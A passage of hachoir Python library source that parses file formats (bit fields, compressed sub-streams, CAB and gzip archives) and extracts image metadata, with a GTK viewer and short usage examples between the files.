createRawDisplay = createDisplay
class Bits(RawBits):
"""
Positive integer with a size in bits
@see: L{Bit}
@see: L{RawBits}
"""
pass
class Bit(RawBits):
"""
Single bit: value can be False or True, and size is exactly one bit.
@see: L{Bits}
"""
static_size = 1
def __init__(self, parent, name, description=None):
"""
Constructor: see L{Field.__init__} for parameter description
"""
RawBits.__init__(self, parent, name, 1, description=description)
def createValue(self):
return 1 == self._parent.stream.readBits(
self.absolute_address, 1, self._parent.endian)
def createRawDisplay(self):
return str(int(self.value))
```
#### File: hachoir/field/sub_file.py
```python
from hachoir.field import Bytes
from hachoir.core.tools import makePrintable, humanFilesize
from hachoir.stream import InputIOStream
class SubFile(Bytes):
"""
File stored in another file
"""
def __init__(self, parent, name, length, description=None,
parser=None, filename=None, mime_type=None, parser_class=None):
if filename:
if not isinstance(filename, str):
filename = makePrintable(filename, "ISO-8859-1")
if not description:
description = 'File "%s" (%s)' % (
filename, humanFilesize(length))
Bytes.__init__(self, parent, name, length, description)
def createInputStream(cis, **args):
tags = args.setdefault("tags", [])
if parser_class:
tags.append(("class", parser_class))
if parser is not None:
tags.append(("id", parser.PARSER_TAGS["id"]))
if mime_type:
tags.append(("mime", mime_type))
if filename:
tags.append(("filename", filename))
return cis(**args)
self.setSubIStream(createInputStream)
class CompressedStream:
offset = 0
def __init__(self, stream, decompressor):
self.stream = stream
self.decompressor = decompressor(stream)
self._buffer = b''
def read(self, size):
d = self._buffer
data = [d[:size]]
size -= len(d)
if size > 0:
d = self.decompressor(size)
data.append(d[:size])
size -= len(d)
while size > 0:
n = 4096
if self.stream.size:
n = min(self.stream.size - self.offset, n)
if not n:
break
d = self.stream.read(self.offset, n)[1]
self.offset += 8 * len(d)
d = self.decompressor(size, d)
data.append(d[:size])
size -= len(d)
self._buffer = d[size + len(d):]
return b''.join(data)
def CompressedField(field, decompressor):
def createInputStream(cis, source=None, **args):
if field._parent:
stream = cis(source=source)
args.setdefault("tags", []).extend(stream.tags)
else:
stream = field.stream
input = CompressedStream(stream, decompressor)
if source is None:
source = "Compressed source: '%s' (offset=%s)" % (
stream.source, field.absolute_address)
return InputIOStream(input, source=source, **args)
field.setSubIStream(createInputStream)
return field
```
#### File: hachoir/metadata/cr2.py
```python
from hachoir.metadata.metadata import (registerExtractor, RootMetadata)
from hachoir.parser.image import CR2File
from hachoir.metadata.safe import fault_tolerant
class CR2Metadata(RootMetadata):
key_to_attr = {
"ImageWidth": "width",
"ImageLength": "height",
"ImageDescription": "comment",
"DocumentName": "title",
"XResolution": "width_dpi",
"YResolution": "height_dpi",
}
def extract(self, tiff):
if "ifd[0]" in tiff:
self.useIFD(tiff["ifd[0]"])
self.camera_manufacturer = tiff["ifd[0]"]["value[4]"].value
self.camera_model = tiff["ifd[0]"]["value[5]"].value
if "exif[0]" in tiff:
self.date_time_original = tiff["exif[0]"]["value[7]"].value
self.date_time_digitized = tiff["exif[0]"]["value[8]"].value
def useIFD(self, ifd):
attr = {}
for entry in ifd.array("entry"):
self.processIfdEntry(ifd, entry, attr)
if 'BitsPerSample' in attr and 'SamplesPerPixel' in attr:
self.bits_per_pixel = attr[
'BitsPerSample'] * attr['SamplesPerPixel']
@fault_tolerant
def processIfdEntry(self, ifd, entry, attr):
tag = entry["tag"].display
if tag in {"BitsPerSample", "SamplesPerPixel"}:
value = ifd.getEntryValues(entry)[0].value
attr[tag] = value
return
try:
attrname = self.key_to_attr[tag]
except KeyError:
return
value = ifd.getEntryValues(entry)[0].value
if tag in {"XResolution", "YResolution"}:
value = round(value)
setattr(self, attrname, value)
registerExtractor(CR2File, CR2Metadata)
```
#### File: hachoir/metadata/formatter.py
```python
NB_CHANNEL_NAME = {1: "mono", 2: "stereo"}
def humanAudioChannel(value):
return NB_CHANNEL_NAME.get(value, str(value))
def humanFrameRate(value):
if isinstance(value, (int, float)):
return "%.1f fps" % value
else:
return value
def humanComprRate(rate):
return "%.1fx" % rate
def humanAltitude(value):
return "%.1f meters" % value
def humanPixelSize(value):
return "%s pixels" % value
def humanDPI(value):
return "%s DPI" % value
```
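These humanizers are plain string formatters; a few example outputs, assuming the module is importable from the hachoir package as laid out above:

```python
from hachoir.metadata.formatter import (humanAudioChannel, humanFrameRate,
                                        humanComprRate, humanDPI)

print(humanAudioChannel(2))    # 'stereo'
print(humanAudioChannel(6))    # '6' -- falls back to str() for unknown counts
print(humanFrameRate(23.976))  # '24.0 fps'
print(humanComprRate(1.52))    # '1.5x'
print(humanDPI(300))           # '300 DPI'
```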
#### File: hachoir/metadata/gtk.py
```python
import sys
import os
from gi.repository import Gtk
from hachoir.parser import createParser
from hachoir.metadata import extractMetadata
class MetadataGtk:
def __init__(self):
self.main_window = Gtk.Window()
self.main_window.set_border_width(5)
self.main_window.connect("destroy", self._destroy)
self.main_vbox = Gtk.VBox()
self.select_hbox = Gtk.HBox()
self.select_button = Gtk.Button("Select")
self.select_button.connect("clicked", self._select_clicked)
self.select_hbox.pack_start(self.select_button, False, True, 0)
self.file_combo = Gtk.ComboBoxText()
self.file_combo.connect("changed", self._file_combo_changed)
self.select_hbox.pack_start(self.file_combo, True, True, 0)
self.main_vbox.pack_start(self.select_hbox, False, True, 0)
self.metadata_table = Gtk.Table(1, 1)
self.metadata_table.attach(
Gtk.Label("Select a file to view metadata information..."), 0, 1, 0, 1)
self.main_vbox.pack_start(self.metadata_table, True, True, 0)
self.main_window.add(self.main_vbox)
self.main_window.show_all()
def add_file(self, filename):
self.file_combo.append_text(filename)
def _select_clicked(self, widget):
file_chooser = Gtk.FileChooserDialog("Ouvrir..", None,
Gtk.FILE_CHOOSER_ACTION_OPEN,
(Gtk.STOCK_CANCEL, Gtk.RESPONSE_CANCEL,
Gtk.STOCK_OPEN, Gtk.RESPONSE_OK))
file_chooser.set_default_response(Gtk.RESPONSE_OK)
file_chooser.show()
reponse = file_chooser.run()
if reponse == Gtk.RESPONSE_OK:
selected_file = file_chooser.get_filename()
self.add_file(selected_file)
file_chooser.destroy()
def _file_combo_changed(self, widget):
self.main_vbox.remove(self.metadata_table)
filename = self.file_combo.get_active_text()
parser = createParser(filename)
metadata = extractMetadata(parser)
self.metadata_table = Gtk.Table(1, 2)
self.main_vbox.pack_start(self.metadata_table, True, True, 0)
if metadata is None:
self.metadata_table.attach(
Gtk.Label("Unknown file format"), 0, 1, 0, 1)
else:
total = 1
for data in sorted(metadata):
if not data.values:
continue
title = data.description
for item in data.values:
self.metadata_table.resize(total, 2)
value = item.text
self.metadata_table.attach(
Gtk.Label(title + ":"), 0, 1, total - 1, total)
self.metadata_table.attach(
Gtk.Label(value), 1, 2, total - 1, total)
total += 1
self.metadata_table.show_all()
def _destroy(self, widget, data=None):
Gtk.main_quit()
def main(self):
has_file = False
for arg in sys.argv[1:]:
if os.path.isdir(arg):
for file in os.listdir(arg):
path = os.path.join(arg, file)
if os.path.isfile(path):
self.add_file(path)
has_file = True
elif os.path.isfile(arg):
self.add_file(arg)
has_file = True
if has_file:
self.file_combo.set_active(0)
Gtk.main()
```
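The viewer is driven entirely by `sys.argv`; a sketch of launching it (the paths and the script name are placeholders, and PyGObject plus a running display are assumed):
```python
# Sketch: launching the metadata viewer on one file or a whole directory.
# Both paths are placeholders.
#   python metadata_gtk_demo.py photo.jpg
#   python metadata_gtk_demo.py ~/Pictures/
if __name__ == "__main__":
    MetadataGtk().main()
```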
#### File: hachoir/metadata/image.py
```python
from hachoir.metadata.metadata import (registerExtractor, Metadata,
RootMetadata, MultipleMetadata)
from hachoir.parser.image import (
BmpFile, IcoFile, PcxFile, GifFile, PngFile, TiffFile,
XcfFile, TargaFile, WMF_File, PsdFile)
from hachoir.parser.image.png import getBitsPerPixel as pngBitsPerPixel
from hachoir.parser.image.xcf import XcfProperty
from hachoir.metadata.safe import fault_tolerant
def computeComprRate(meta, compr_size):
"""
Compute image compression rate. Skip size of color palette, focus on
image pixels. Original size is width x height x bpp. Compressed size
is an argument (in bits).
Set "compr_data" with a string like "1.52x".
"""
if (not meta.has("width")
or not meta.has("height")
or not meta.has("bits_per_pixel")):
return
if not compr_size:
return
orig_size = meta.get('width') * meta.get('height') * \
meta.get('bits_per_pixel')
meta.compr_rate = float(orig_size) / compr_size
class BmpMetadata(RootMetadata):
def extract(self, image):
if "header" not in image:
return
hdr = image["header"]
self.width = hdr["width"].value
self.height = hdr["height"].value
bpp = hdr["bpp"].value
if bpp:
if bpp <= 8 and "used_colors" in hdr:
self.nb_colors = hdr["used_colors"].value
self.bits_per_pixel = bpp
self.compression = hdr["compression"].display
self.format_version = ("Microsoft Bitmap version %s"
% hdr.getFormatVersion())
self.width_dpi = hdr["horizontal_dpi"].value
self.height_dpi = hdr["vertical_dpi"].value
if "pixels" in image:
computeComprRate(self, image["pixels"].size)
class TiffMetadata(RootMetadata):
key_to_attr = {
"ImageWidth": "width",
"ImageLength": "height",
"Software": "producer",
"ImageDescription": "comment",
"DocumentName": "title",
"XResolution": "width_dpi",
"YResolution": "height_dpi",
"DateTime": "creation_date",
}
def extract(self, tiff):
if "ifd[0]" in tiff:
self.useIFD(tiff["ifd[0]"])
def useIFD(self, ifd):
attr = {}
for entry in ifd.array("entry"):
self.processIfdEntry(ifd, entry, attr)
if 'BitsPerSample' in attr and 'SamplesPerPixel' in attr:
self.bits_per_pixel = attr[
'BitsPerSample'] * attr['SamplesPerPixel']
@fault_tolerant
def processIfdEntry(self, ifd, entry, attr):
tag = entry["tag"].display
if tag in {"BitsPerSample", "SamplesPerPixel"}:
value = ifd.getEntryValues(entry)[0].value
attr[tag] = value
return
try:
attrname = self.key_to_attr[tag]
except KeyError:
return
value = ifd.getEntryValues(entry)[0].value
if tag in {"XResolution", "YResolution"}:
value = round(value)
setattr(self, attrname, value)
class IcoMetadata(MultipleMetadata):
color_to_bpp = {
2: 1,
16: 4,
256: 8
}
def extract(self, icon):
for index, header in enumerate(icon.array("icon_header")):
image = Metadata(self)
# Read size and colors from header
image.width = header["width"].value
image.height = header["height"].value
bpp = header["bpp"].value
nb_colors = header["nb_color"].value
if nb_colors != 0:
image.nb_colors = nb_colors
if bpp == 0 and nb_colors in self.color_to_bpp:
bpp = self.color_to_bpp[nb_colors]
elif bpp == 0:
bpp = 8
image.bits_per_pixel = bpp
image.setHeader("Icon #%u (%sx%s)"
% (1 + index,
image.get("width", "?"),
image.get("height", "?")))
# Read compression from data (if available)
key = "icon_data[%u]/header/codec" % index
if key in icon:
image.compression = icon[key].display
key = "icon_data[%u]/pixels" % index
if key in icon:
computeComprRate(image, icon[key].size)
# Store new image
self.addGroup("image[%u]" % index, image)
class PcxMetadata(RootMetadata):
@fault_tolerant
def extract(self, pcx):
self.width = 1 + pcx["xmax"].value
self.height = 1 + pcx["ymax"].value
self.width_dpi = pcx["horiz_dpi"].value
self.height_dpi = pcx["vert_dpi"].value
self.bits_per_pixel = pcx["bpp"].value
if 1 <= pcx["bpp"].value <= 8:
self.nb_colors = 2 ** pcx["bpp"].value
self.compression = "Run-length encoding (RLE)"
self.format_version = "PCX: %s" % pcx["version"].display
if "image_data" in pcx:
computeComprRate(self, pcx["image_data"].size)
class XcfMetadata(RootMetadata):
# Map image type to bits/pixel
TYPE_TO_BPP = {0: 24, 1: 8, 2: 8}
def extract(self, xcf):
self.width = xcf["width"].value
self.height = xcf["height"].value
try:
self.bits_per_pixel = self.TYPE_TO_BPP[xcf["type"].value]
except KeyError:
pass
self.format_version = xcf["type"].display
self.readProperties(xcf)
@fault_tolerant
def processProperty(self, prop):
type = prop["type"].value
if type == XcfProperty.PROP_PARASITES:
for field in prop["data"]:
if "name" not in field or "data" not in field:
continue
if field["name"].value == "gimp-comment":
self.comment = field["data"].value
elif type == XcfProperty.PROP_COMPRESSION:
self.compression = prop["data/compression"].display
elif type == XcfProperty.PROP_RESOLUTION:
self.width_dpi = int(prop["data/xres"].value)
self.height_dpi = int(prop["data/yres"].value)
def readProperties(self, xcf):
for prop in xcf.array("property"):
self.processProperty(prop)
class PngMetadata(RootMetadata):
TEXT_TO_ATTR = {
"software": "producer",
}
def extract(self, png):
if "header" in png:
self.useHeader(png["header"])
if "time" in png:
self.useTime(png["time"])
if "physical" in png:
self.usePhysical(png["physical"])
for comment in png.array("text"):
if "text" not in comment:
continue
keyword = comment["keyword"].value
text = comment["text"].value
try:
key = self.TEXT_TO_ATTR[keyword.lower()]
setattr(self, key, text)
except KeyError:
if keyword.lower() != "comment":
self.comment = "%s=%s" % (keyword, text)
else:
self.comment = text
compr_size = sum(data.size for data in png.array("data"))
computeComprRate(self, compr_size)
@fault_tolerant
def useTime(self, field):
self.creation_date = field.value
@fault_tolerant
def usePhysical(self, field):
self.width_dpi = field["pixel_per_unit_x"].value
self.height_dpi = field["pixel_per_unit_y"].value
@fault_tolerant
def useHeader(self, header):
self.width = header["width"].value
self.height = header["height"].value
# Read number of colors and pixel format
if "/palette/size" in header:
nb_colors = header["/palette/size"].value // 3
else:
nb_colors = None
if not header["has_palette"].value:
if header["has_alpha"].value:
self.pixel_format = "RGBA"
else:
self.pixel_format = "RGB"
elif "/transparency" in header:
self.pixel_format = "Color index with transparency"
if nb_colors:
nb_colors -= 1
else:
self.pixel_format = "Color index"
self.bits_per_pixel = pngBitsPerPixel(header)
if nb_colors:
self.nb_colors = nb_colors
# Read compression, timestamp, etc.
self.compression = header["compression"].display
class GifMetadata(RootMetadata):
def extract(self, gif):
self.useScreen(gif["/screen"])
if self.has("bits_per_pixel"):
self.nb_colors = (1 << self.get('bits_per_pixel'))
self.compression = "LZW"
self.format_version = "GIF version %s" % gif["version"].value
for comments in gif.array("comments"):
for comment in gif.array(comments.name + "/comment"):
self.comment = comment.value
if ("graphic_ctl/has_transp" in gif
and gif["graphic_ctl/has_transp"].value):
self.pixel_format = "Color index with transparency"
else:
self.pixel_format = "Color index"
@fault_tolerant
def useScreen(self, screen):
self.width = screen["width"].value
self.height = screen["height"].value
self.bits_per_pixel = (1 + screen["size_global_map"].value)
class TargaMetadata(RootMetadata):
def extract(self, tga):
self.width = tga["width"].value
self.height = tga["height"].value
self.bits_per_pixel = tga["bpp"].value
if tga["nb_color"].value:
self.nb_colors = tga["nb_color"].value
self.compression = tga["codec"].display
if "pixels" in tga:
computeComprRate(self, tga["pixels"].size)
class WmfMetadata(RootMetadata):
def extract(self, wmf):
if wmf.isAPM():
if "amf_header/rect" in wmf:
rect = wmf["amf_header/rect"]
self.width = (rect["right"].value - rect["left"].value)
self.height = (rect["bottom"].value - rect["top"].value)
self.bits_per_pixel = 24
elif wmf.isEMF():
emf = wmf["emf_header"]
if "description" in emf:
desc = emf["description"].value
if "\0" in desc:
self.producer, self.title = desc.split("\0", 1)
else:
self.producer = desc
if emf["nb_colors"].value:
self.nb_colors = emf["nb_colors"].value
self.bits_per_pixel = 8
else:
self.bits_per_pixel = 24
self.width = emf["width_px"].value
self.height = emf["height_px"].value
class PsdMetadata(RootMetadata):
@fault_tolerant
def extract(self, psd):
self.width = psd["width"].value
self.height = psd["height"].value
self.bits_per_pixel = psd["depth"].value * psd["nb_channels"].value
self.pixel_format = psd["color_mode"].display
self.compression = psd["compression"].display
registerExtractor(IcoFile, IcoMetadata)
registerExtractor(GifFile, GifMetadata)
registerExtractor(XcfFile, XcfMetadata)
registerExtractor(TargaFile, TargaMetadata)
registerExtractor(PcxFile, PcxMetadata)
registerExtractor(BmpFile, BmpMetadata)
registerExtractor(PngFile, PngMetadata)
registerExtractor(TiffFile, TiffMetadata)
registerExtractor(WMF_File, WmfMetadata)
registerExtractor(PsdFile, PsdMetadata)
```
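The arithmetic in `computeComprRate` is easy to check by hand; a worked example for an 800x600 24-bit image whose pixel data takes 180000 bytes on disk:
```python
# Worked example of the compression-rate formula in computeComprRate:
# original size is width * height * bits_per_pixel; compressed size is in bits.
width, height, bpp = 800, 600, 24
orig_size = width * height * bpp        # 11520000 bits uncompressed
compr_size = 180000 * 8                 # 1440000 bits on disk
rate = float(orig_size) / compr_size    # 8.0
print("%.1fx" % rate)                   # "8.0x", as humanComprRate renders it
```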
#### File: parser/archive/cab.py
```python
from hachoir.parser import Parser
from hachoir.field import (FieldSet, Enum,
CString, String,
UInt8, UInt16, UInt32, Bit, Bits, PaddingBits, NullBits,
DateTimeMSDOS32, RawBytes)
from hachoir.core.text_handler import textHandler, hexadecimal, filesizeHandler
from hachoir.core.endian import LITTLE_ENDIAN
from hachoir.core.tools import paddingSize
from hachoir.stream import StringInputStream
from hachoir.parser.archive.lzx import LZXStream, lzx_decompress
from hachoir.parser.archive.zlib import DeflateBlock
MAX_NB_FOLDER = 30
COMPRESSION_NONE = 0
COMPRESSION_NAME = {
0: "Uncompressed",
1: "Deflate",
2: "Quantum",
3: "LZX",
}
class Folder(FieldSet):
def createFields(self):
yield UInt32(self, "offset", "Offset to data (from file start)")
yield UInt16(self, "data_blocks", "Number of data blocks which are in this cabinet")
yield Enum(Bits(self, "compr_method", 4, "Compression method"), COMPRESSION_NAME)
if self["compr_method"].value in [2, 3]: # Quantum or LZX use compression level
yield PaddingBits(self, "padding[]", 4)
yield Bits(self, "compr_level", 5, "Compression level")
yield PaddingBits(self, "padding[]", 3)
else:
yield PaddingBits(self, "padding[]", 12)
if self["../flags/has_reserved"].value and self["../reserved_folder_size"].value:
yield RawBytes(self, "reserved_folder", self["../reserved_folder_size"].value, "Per-folder reserved area")
def createDescription(self):
text = "Folder: compression %s" % self["compr_method"].display
if self["compr_method"].value in [2, 3]: # Quantum or LZX use compression level
text += " (level %u: window size %u)" % (
self["compr_level"].value, 2**self["compr_level"].value)
return text
class CabFileAttributes(FieldSet):
def createFields(self):
yield Bit(self, "readonly")
yield Bit(self, "hidden")
yield Bit(self, "system")
yield Bits(self, "reserved[]", 2)
yield Bit(self, "archive", "Has the file been modified since the last backup?")
yield Bit(self, "exec", "Run file after extraction?")
yield Bit(self, "name_is_utf", "Is the filename using UTF-8?")
yield Bits(self, "reserved[]", 8)
class File(FieldSet):
def createFields(self):
yield filesizeHandler(UInt32(self, "filesize", "Uncompressed file size"))
yield UInt32(self, "folder_offset", "File offset in uncompressed folder")
yield Enum(UInt16(self, "folder_index", "Containing folder ID (index)"), {
0xFFFD: "Folder continued from previous cabinet (real folder ID = 0)",
0xFFFE: "Folder continued to next cabinet (real folder ID = %i)" % (self["../nb_folder"].value - 1),
0xFFFF: "Folder spanning previous, current and next cabinets (real folder ID = 0)"})
yield DateTimeMSDOS32(self, "timestamp")
yield CabFileAttributes(self, "attributes")
if self["attributes/name_is_utf"].value:
yield CString(self, "filename", charset="UTF-8")
else:
yield CString(self, "filename", charset="ASCII")
def createDescription(self):
return "File %s (%s)" % (
self["filename"].display, self["filesize"].display)
class Flags(FieldSet):
static_size = 16
def createFields(self):
yield Bit(self, "has_previous")
yield Bit(self, "has_next")
yield Bit(self, "has_reserved")
yield NullBits(self, "padding", 13)
class FragmentGroup:
def __init__(self, parser):
self.items = []
self.parser = parser
self.args = {}
def add(self, item):
self.items.append(item)
def createInputStream(self):
# FIXME: Use lazy stream creation
data = []
for item in self.items:
data.append(item["rawdata"].value)
data = b"".join(data)
# FIXME: Use smarter code to send arguments
self.args["compr_level"] = self.items[
0].parent.parent.folder["compr_level"].value
tags = {"class": self.parser, "args": self.args}
tags = iter(tags.items())
return StringInputStream(data, "<fragment group>", tags=tags)
class CustomFragment(FieldSet):
def __init__(self, parent, name, size, parser, description=None, group=None):
FieldSet.__init__(self, parent, name, description, size=size)
if not group:
group = FragmentGroup(parser)
self.field_size = size
self.group = group
self.group.add(self)
def createFields(self):
yield RawBytes(self, "rawdata", self.field_size // 8)
def _createInputStream(self, **args):
return self.group.createInputStream()
class DataBlock(FieldSet):
def __init__(self, *args, **kwargs):
FieldSet.__init__(self, *args, **kwargs)
size = (self["size"].value + 8) * 8 # +8 for header values
if self["/flags/has_reserved"].value:
size += self["/reserved_data_size"].value * 8
self._size = size
def createFields(self):
yield textHandler(UInt32(self, "crc32"), hexadecimal)
yield UInt16(self, "size")
yield UInt16(self, "uncompressed_size", "If this is 0, this block is continued in a subsequent cabinet")
if self["/flags/has_reserved"].value and self["/reserved_data_size"].value:
yield RawBytes(self, "reserved_data", self["/reserved_data_size"].value, "Per-datablock reserved area")
compr_method = self.parent.folder["compr_method"].value
if compr_method == 0: # Uncompressed
yield RawBytes(self, "data", self["size"].value, "Folder Data")
self.parent.uncompressed_data += self["data"].value
elif compr_method == 1: # MSZIP
yield String(self, "mszip_signature", 2, "MSZIP Signature (CK)")
yield DeflateBlock(self, "deflate_block", self.parent.uncompressed_data)
padding = paddingSize(self.current_size, 8)
if padding:
yield PaddingBits(self, "padding[]", padding)
self.parent.uncompressed_data = self["deflate_block"].uncomp_data
elif compr_method == 2: # Quantum
yield RawBytes(self, "compr_data", self["size"].value, "Compressed Folder Data")
elif compr_method == 3: # LZX
group = getattr(self.parent.folder, "lzx_group", None)
field = CustomFragment(
self, "data", self["size"].value * 8, LZXStream, "LZX data fragment", group)
self.parent.folder.lzx_group = field.group
yield field
class FolderParser(Parser):
endian = LITTLE_ENDIAN
def createFields(self):
for file in sorted(self.files, key=lambda x: x["folder_offset"].value):
padding = self.seekByte(file["folder_offset"].value)
if padding:
yield padding
yield RawBytes(self, "file[]", file["filesize"].value, file.description)
class FolderData(FieldSet):
def __init__(self, parent, name, folder, files, *args, **kwargs):
FieldSet.__init__(self, parent, name, *args, **kwargs)
def createInputStream(cis, source=None, **args):
stream = cis(source=source)
tags = args.setdefault("tags", [])
tags.extend(stream.tags)
tags.append(("class", FolderParser))
tags.append(("args", {'files': files}))
for unused in self:
pass
if folder["compr_method"].value == 3: # LZX
self.uncompressed_data = lzx_decompress(
self["block[0]/data"].getSubIStream(), folder["compr_level"].value)
return StringInputStream(self.uncompressed_data, source=source, **args)
self.setSubIStream(createInputStream)
self.files = files
self.folder = folder # Folder fieldset
def createFields(self):
self.uncompressed_data = ""
for index in range(self.folder["data_blocks"].value):
block = DataBlock(self, "block[]")
for i in block:
pass
yield block
class CabFile(Parser):
endian = LITTLE_ENDIAN
MAGIC = b"MSCF"
PARSER_TAGS = {
"id": "cab",
"category": "archive",
"file_ext": ("cab",),
"mime": ("application/vnd.ms-cab-compressed",),
"magic": ((MAGIC, 0),),
"min_size": 1 * 8, # header + file entry
"description": "Microsoft Cabinet archive"
}
def validate(self):
if self.stream.readBytes(0, 4) != self.MAGIC:
return "Invalid magic"
if self["major_version"].value != 1 or self["minor_version"].value != 3:
return "Unknown version (%i.%i)" % (self["major_version"].value, self["minor_version"].value)
if not (1 <= self["nb_folder"].value <= MAX_NB_FOLDER):
return "Invalid number of folder (%s)" % self["nb_folder"].value
return True
def createFields(self):
yield String(self, "magic", 4, "Magic (MSCF)", charset="ASCII")
yield textHandler(UInt32(self, "hdr_checksum", "Header checksum (0 if not used)"), hexadecimal)
yield filesizeHandler(UInt32(self, "filesize", "Cabinet file size"))
yield textHandler(UInt32(self, "fld_checksum", "Folders checksum (0 if not used)"), hexadecimal)
yield UInt32(self, "off_file", "Offset of first file")
yield textHandler(UInt32(self, "files_checksum", "Files checksum (0 if not used)"), hexadecimal)
yield UInt8(self, "minor_version", "Minor version (should be 3)")
yield UInt8(self, "major_version", "Major version (should be 1)")
yield UInt16(self, "nb_folder", "Number of folders")
yield UInt16(self, "nb_files", "Number of files")
yield Flags(self, "flags")
yield UInt16(self, "setid")
yield UInt16(self, "cabinet_serial", "Zero-based cabinet number")
if self["flags/has_reserved"].value:
yield UInt16(self, "reserved_header_size", "Size of per-cabinet reserved area")
yield UInt8(self, "reserved_folder_size", "Size of per-folder reserved area")
yield UInt8(self, "reserved_data_size", "Size of per-datablock reserved area")
if self["reserved_header_size"].value:
yield RawBytes(self, "reserved_header", self["reserved_header_size"].value, "Per-cabinet reserved area")
if self["flags/has_previous"].value:
yield CString(self, "previous_cabinet", "File name of previous cabinet", charset="ASCII")
yield CString(self, "previous_disk", "Description of disk/media on which previous cabinet resides", charset="ASCII")
if self["flags/has_next"].value:
yield CString(self, "next_cabinet", "File name of next cabinet", charset="ASCII")
yield CString(self, "next_disk", "Description of disk/media on which next cabinet resides", charset="ASCII")
folders = []
files = []
for index in range(self["nb_folder"].value):
folder = Folder(self, "folder[]")
yield folder
folders.append(folder)
for index in range(self["nb_files"].value):
file = File(self, "file[]")
yield file
files.append(file)
folders = sorted(enumerate(folders),
key=lambda x: x[1]["offset"].value)
for i in range(len(folders)):
index, folder = folders[i]
padding = self.seekByte(folder["offset"].value)
if padding:
yield padding
            folder_files = []
            for file in files:
                if file["folder_index"].value == index:
                    folder_files.append(file)
            if i + 1 == len(folders):
                size = (self.size // 8) - folder["offset"].value
            else:
                size = (folders[i + 1][1]["offset"].value) - \
                    folder["offset"].value
            yield FolderData(self, "folder_data[%i]" % index, folder, folder_files, size=size * 8)
end = self.seekBit(self.size, "endraw")
if end:
yield end
def createContentSize(self):
return self["filesize"].value * 8
```
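A sketch of walking the parsed cabinet header (the path `example.cab` is a placeholder):
```python
# Sketch: inspecting a cabinet with the CabFile parser above.
from hachoir.parser import createParser

cab = createParser("example.cab")   # placeholder path
if cab:
    print("folders:", cab["nb_folder"].value)
    print("files:  ", cab["nb_files"].value)
    for entry in cab.array("file"):
        print(" ", entry["filename"].display, entry["filesize"].display)
```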
#### File: parser/archive/gzip_parser.py
```python
from hachoir.parser import Parser
from hachoir.field import (
UInt8, UInt16, UInt32, Enum, TimestampUnix32,
Bit, CString, SubFile,
NullBits, Bytes, RawBytes)
from hachoir.core.text_handler import textHandler, hexadecimal, filesizeHandler
from hachoir.core.endian import LITTLE_ENDIAN
from hachoir.parser.common.deflate import Deflate
class GzipParser(Parser):
endian = LITTLE_ENDIAN
PARSER_TAGS = {
"id": "gzip",
"category": "archive",
"file_ext": ("gz",),
"mime": ("application/x-gzip",),
"min_size": 18 * 8,
"magic_regex": (
# (magic, compression=deflate, <flags>, <mtime>, )
            (b'\x1F\x8B\x08.{5}[\0\2\4\6][\x00-\x0D]', 0),
),
"description": "gzip archive",
}
os_name = {
0: "FAT filesystem",
1: "Amiga",
2: "VMS (or OpenVMS)",
3: "Unix",
4: "VM/CMS",
5: "Atari TOS",
6: "HPFS filesystem (OS/2, NT)",
7: "Macintosh",
8: "Z-System",
9: "CP/M",
10: "TOPS-20",
11: "NTFS filesystem (NT)",
12: "QDOS",
13: "Acorn RISCOS",
}
COMPRESSION_NAME = {
8: "deflate",
}
def validate(self):
if self["signature"].value != b'\x1F\x8B':
return "Invalid signature"
if self["compression"].value not in self.COMPRESSION_NAME:
return "Unknown compression method (%u)" % self["compression"].value
if self["reserved[0]"].value != 0:
return "Invalid reserved[0] value"
if self["reserved[1]"].value != 0:
return "Invalid reserved[1] value"
if self["reserved[2]"].value != 0:
return "Invalid reserved[2] value"
return True
def createFields(self):
# Gzip header
yield Bytes(self, "signature", 2, r"GZip file signature (\x1F\x8B)")
yield Enum(UInt8(self, "compression", "Compression method"), self.COMPRESSION_NAME)
# Flags
yield Bit(self, "is_text", "File content is probably ASCII text")
yield Bit(self, "has_crc16", "Header CRC16")
yield Bit(self, "has_extra", "Extra informations (variable size)")
yield Bit(self, "has_filename", "Contains filename?")
yield Bit(self, "has_comment", "Contains comment?")
yield NullBits(self, "reserved[]", 3)
yield TimestampUnix32(self, "mtime", "Modification time")
# Extra flags
yield NullBits(self, "reserved[]", 1)
yield Bit(self, "slowest", "Compressor used maximum compression (slowest)")
yield Bit(self, "fastest", "Compressor used the fastest compression")
yield NullBits(self, "reserved[]", 5)
yield Enum(UInt8(self, "os", "Operating system"), self.os_name)
# Optional fields
if self["has_extra"].value:
yield UInt16(self, "extra_length", "Extra length")
yield RawBytes(self, "extra", self["extra_length"].value, "Extra")
if self["has_filename"].value:
yield CString(self, "filename", "Filename", charset="ISO-8859-1")
if self["has_comment"].value:
yield CString(self, "comment", "Comment")
if self["has_crc16"].value:
yield textHandler(UInt16(self, "hdr_crc16", "CRC16 of the header"),
hexadecimal)
if self._size is None: # TODO: is it possible to handle piped input?
raise NotImplementedError()
# Read file
size = (self._size - self.current_size) // 8 - 8 # -8: crc32+size
if 0 < size:
if self["has_filename"].value:
filename = self["filename"].value
else:
for tag, filename in self.stream.tags:
if tag == "filename" and filename.endswith(".gz"):
filename = filename[:-3]
break
else:
filename = None
yield Deflate(SubFile(self, "file", size, filename=filename))
# Footer
yield textHandler(UInt32(self, "crc32",
"Uncompressed data content CRC32"), hexadecimal)
yield filesizeHandler(UInt32(self, "size", "Uncompressed size"))
def createDescription(self):
desc = "gzip archive"
info = []
if "filename" in self:
info.append('filename "%s"' % self["filename"].value)
if "size" in self:
info.append("was %s" % self["size"].display)
if self["mtime"].value:
info.append(self["mtime"].display)
return "%s: %s" % (desc, ", ".join(info))
```
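Because `validate()` only needs the two magic bytes, the deflate method ID and zeroed reserved bits, the parser can be exercised against an in-memory archive; a sketch (assuming hachoir 3, where `StringInputStream` wraps raw bytes):
```python
# Sketch: parsing an in-memory gzip archive with GzipParser.
import gzip
from hachoir.stream import StringInputStream
from hachoir.parser import guessParser

data = gzip.compress(b"hello, hachoir")
parser = guessParser(StringInputStream(data))
print(parser["compression"].display)   # "deflate"
print(parser["os"].value)              # OS byte written by the compressor
print(parser["size"].value)            # 14, the uncompressed length
```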
#### File: parser/archive/prs_pak.py
```python
from hachoir.parser import Parser
from hachoir.field import (UInt32, String, SubFile, FieldSet)
from hachoir.core.endian import LITTLE_ENDIAN
from hachoir.core.text_handler import filesizeHandler
class FileEntry(FieldSet):
def createFields(self):
yield String(self, "filename", 56, truncate="\0")
yield filesizeHandler(UInt32(self, "size"))
yield SubFile(self, "data", self["size"].value, filename=self["filename"].value)
def createDescription(self):
return self["filename"].value
class PRSPakFile(Parser):
PARSER_TAGS = {
"id": "prs_pak",
"category": "archive",
